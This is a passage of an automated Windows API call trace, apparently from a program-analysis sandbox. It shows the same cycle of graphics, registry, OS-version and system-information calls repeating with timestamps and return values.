hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.743] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.743] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.743] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb00401cd [0087.743] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xae0401d0 [0087.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad7 [0087.743] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ad8 [0087.743] CombineRgn (hrgnDst=0x1040ad7, hrgnSrc1=0xb00401cd, hrgnSrc2=0xae0401d0, iMode=1) returned 1 [0087.743] CombineRgn (hrgnDst=0x1040ad8, hrgnSrc1=0xb00401cd, hrgnSrc2=0xae0401d0, iMode=4) returned 2 [0087.743] CreateSolidBrush (color=0xff) returned 0x2100ad6 [0087.743] CreateSolidBrush (color=0xff0000) returned 0x1100ad9 [0087.743] DeleteObject (ho=0x1100ad9) returned 1 [0087.743] DeleteObject (ho=0xae0401d0) returned 1 [0087.743] DeleteObject (ho=0xb00401cd) returned 1 [0087.743] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.743] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.744] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.744] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.744] BeginPath (hdc=0x0) returned 0 [0087.744] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.744] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.744] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.744] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.744] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.744] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xaf0401d0 [0087.744] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb10401cd [0087.744] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ada [0087.744] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040adb [0087.744] CombineRgn (hrgnDst=0x1040ada, hrgnSrc1=0xaf0401d0, hrgnSrc2=0xb10401cd, iMode=1) returned 1 [0087.744] CombineRgn (hrgnDst=0x1040adb, hrgnSrc1=0xaf0401d0, hrgnSrc2=0xb10401cd, iMode=4) returned 2 [0087.744] CreateSolidBrush (color=0xff) returned 0x2100ad9 [0087.744] CreateSolidBrush (color=0xff0000) returned 0x1100adc [0087.744] DeleteObject (ho=0x1100adc) returned 1 [0087.744] DeleteObject (ho=0xb10401cd) returned 1 [0087.744] DeleteObject (ho=0xaf0401d0) returned 1 [0087.744] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.744] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.744] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.744] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.744] BeginPath (hdc=0x0) returned 0 [0087.744] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.744] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.744] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.744] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.744] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.744] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.744] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.744] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb20401cd [0087.745] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb00401d0 [0087.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040add [0087.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ade [0087.745] CombineRgn (hrgnDst=0x1040add, hrgnSrc1=0xb20401cd, hrgnSrc2=0xb00401d0, iMode=1) returned 1 [0087.745] CombineRgn (hrgnDst=0x1040ade, hrgnSrc1=0xb20401cd, hrgnSrc2=0xb00401d0, iMode=4) returned 2 [0087.745] CreateSolidBrush (color=0xff) returned 0x2100adc [0087.745] CreateSolidBrush (color=0xff0000) returned 0x1100adf [0087.745] DeleteObject (ho=0x1100adf) returned 1 [0087.745] DeleteObject (ho=0xb00401d0) returned 1 [0087.745] DeleteObject (ho=0xb20401cd) returned 1 [0087.745] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.745] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.745] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.745] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.745] BeginPath (hdc=0x0) returned 0 [0087.745] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.745] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.745] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.745] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.745] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.745] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.745] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.745] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb10401d0 [0087.745] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb30401cd [0087.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae0 [0087.745] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae1 [0087.745] CombineRgn (hrgnDst=0x1040ae0, hrgnSrc1=0xb10401d0, hrgnSrc2=0xb30401cd, iMode=1) returned 1 [0087.745] CombineRgn (hrgnDst=0x1040ae1, hrgnSrc1=0xb10401d0, hrgnSrc2=0xb30401cd, iMode=4) returned 2 [0087.745] CreateSolidBrush (color=0xff) returned 0x2100adf [0087.745] CreateSolidBrush (color=0xff0000) returned 0x1100ae2 [0087.745] DeleteObject (ho=0x1100ae2) returned 1 [0087.745] DeleteObject (ho=0xb30401cd) returned 1 [0087.745] DeleteObject (ho=0xb10401d0) returned 1 [0087.745] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.745] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.745] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.745] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.745] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.745] BeginPath (hdc=0x0) returned 0 [0087.745] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.746] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.746] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.746] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.746] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.746] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb40401cd [0087.746] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb20401d0 [0087.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae3 [0087.746] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae4 [0087.746] CombineRgn (hrgnDst=0x1040ae3, hrgnSrc1=0xb40401cd, hrgnSrc2=0xb20401d0, iMode=1) returned 1 [0087.746] CombineRgn (hrgnDst=0x1040ae4, hrgnSrc1=0xb40401cd, hrgnSrc2=0xb20401d0, iMode=4) returned 2 [0087.746] CreateSolidBrush (color=0xff) returned 0x2100ae2 [0087.746] CreateSolidBrush (color=0xff0000) returned 0x1100ae5 [0087.746] DeleteObject (ho=0x1100ae5) returned 1 [0087.746] DeleteObject (ho=0xb20401d0) returned 1 [0087.746] DeleteObject (ho=0xb40401cd) returned 1 [0087.746] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.746] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.746] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.746] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.746] BeginPath (hdc=0x0) returned 0 [0087.746] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.746] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.746] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.746] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.746] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.746] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.746] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.746] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb30401d0 [0087.746] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb50401cd [0087.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae6 [0087.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae7 [0087.747] CombineRgn (hrgnDst=0x1040ae6, hrgnSrc1=0xb30401d0, hrgnSrc2=0xb50401cd, iMode=1) returned 1 [0087.747] CombineRgn (hrgnDst=0x1040ae7, hrgnSrc1=0xb30401d0, hrgnSrc2=0xb50401cd, iMode=4) returned 2 [0087.747] CreateSolidBrush (color=0xff) returned 0x2100ae5 [0087.747] CreateSolidBrush (color=0xff0000) returned 0x1100ae8 [0087.747] DeleteObject (ho=0x1100ae8) returned 1 [0087.747] DeleteObject (ho=0xb50401cd) returned 1 [0087.747] DeleteObject (ho=0xb30401d0) returned 1 [0087.747] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.747] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.747] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.747] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.747] BeginPath (hdc=0x0) returned 0 [0087.747] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.747] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.747] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.747] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.747] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.747] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.747] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb60401cd [0087.747] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb40401d0 [0087.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040ae9 [0087.747] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aea [0087.747] CombineRgn (hrgnDst=0x1040ae9, hrgnSrc1=0xb60401cd, hrgnSrc2=0xb40401d0, iMode=1) returned 1 [0087.747] CombineRgn (hrgnDst=0x1040aea, hrgnSrc1=0xb60401cd, hrgnSrc2=0xb40401d0, iMode=4) returned 2 [0087.747] CreateSolidBrush (color=0xff) returned 0x2100ae8 [0087.747] CreateSolidBrush (color=0xff0000) returned 0x1100aeb [0087.747] DeleteObject (ho=0x1100aeb) returned 1 [0087.747] DeleteObject (ho=0xb40401d0) returned 1 [0087.747] DeleteObject (ho=0xb60401cd) returned 1 [0087.747] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.747] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.747] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.747] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.747] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.747] BeginPath (hdc=0x0) returned 0 [0087.748] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.748] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.748] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.748] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.748] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb50401d0 [0087.748] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb70401cd [0087.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aec [0087.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aed [0087.748] CombineRgn (hrgnDst=0x1040aec, hrgnSrc1=0xb50401d0, hrgnSrc2=0xb70401cd, iMode=1) returned 1 [0087.748] CombineRgn (hrgnDst=0x1040aed, hrgnSrc1=0xb50401d0, hrgnSrc2=0xb70401cd, iMode=4) returned 2 [0087.748] CreateSolidBrush (color=0xff) returned 0x2100aeb [0087.748] CreateSolidBrush (color=0xff0000) returned 0x1100aee [0087.748] DeleteObject (ho=0x1100aee) returned 1 [0087.748] DeleteObject (ho=0xb70401cd) returned 1 [0087.748] DeleteObject (ho=0xb50401d0) returned 1 [0087.748] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.748] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.748] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.748] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.748] BeginPath (hdc=0x0) returned 0 [0087.748] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.748] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.748] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.748] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.748] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.748] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.748] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.748] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb80401cd [0087.748] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb60401d0 [0087.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040aef [0087.748] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af0 [0087.748] CombineRgn (hrgnDst=0x1040aef, hrgnSrc1=0xb80401cd, hrgnSrc2=0xb60401d0, iMode=1) returned 1 [0087.749] CombineRgn (hrgnDst=0x1040af0, hrgnSrc1=0xb80401cd, hrgnSrc2=0xb60401d0, iMode=4) returned 2 [0087.749] CreateSolidBrush (color=0xff) returned 0x2100aee [0087.749] CreateSolidBrush (color=0xff0000) returned 0x1100af1 [0087.749] DeleteObject (ho=0x1100af1) returned 1 [0087.749] DeleteObject (ho=0xb60401d0) returned 1 [0087.749] DeleteObject (ho=0xb80401cd) returned 1 [0087.749] GetVersionExA (in: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x1816f0*(dwOSVersionInfoSize=0x9c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1 [0087.749] GetSystemInfo (in: lpSystemInfo=0x1817e8 | out: lpSystemInfo=0x1817e8*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0087.749] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.749] SelectObject (hdc=0x0, h=0x0) returned 0x0 [0087.749] SetDCPenColor (hdc=0x0, color=0x0) returned 0xffffffff [0087.749] BeginPath (hdc=0x0) returned 0 [0087.749] MoveToEx (in: hdc=0x0, x=1903, y=187, lppt=0x0 | out: lppt=0x0) returned 0 [0087.749] AngleArc (hdc=0x0, x=0, y=0, r=0x32, StartAngle=0x0, SweepAngle=0x43960000) returned 0 [0087.749] BeginPaint (in: hWnd=0x0, lpPaint=0x1817cc | out: lpPaint=0x1817cc) returned 0x0 [0087.749] GetClientRect (in: hWnd=0x0, lpRect=0x1817ac | out: lpRect=0x1817ac) returned 0 [0087.749] GetWindowRect (in: hWnd=0x0, lpRect=0x18179c | out: lpRect=0x18179c) returned 0 [0087.749] GetWindowRect (in: hWnd=0x0, lpRect=0x18178c | out: lpRect=0x18178c) returned 0 [0087.749] RtlUnwind (TargetFrame=0x181840, TargetIp=0x5582fd98, ExceptionRecord=0x0, ReturnValue=0x0) [0087.749] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="SOFTWARE\\Microsoft\\MediaPlayer", ulOptions=0x0, samDesired=0x0, phkResult=0x181828 | out: phkResult=0x181828*=0x0) returned 0x5 [0087.749] CreateRectRgn (x1=0, y1=0, x2=10, y2=10) returned 0xb70401d0 [0087.749] CreateRectRgn (x1=50, y1=50, x2=150, y2=150) returned 0xb90401cd [0087.749] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af2 [0087.749] CreateRectRgn (x1=0, y1=0, x2=0, y2=0) returned 0x1040af3 [0087.749] CombineRgn (hrgnDst=0x1040af2, hrgnSrc1=0xb70401d0, hrgnSrc2=0xb90401cd, iMode=1) returned 1 [0087.749] CombineRgn (hrgnDst=0x1040af3, hrgnSrc1=0xb70401d0, hrgnSrc2=0xb90401cd, 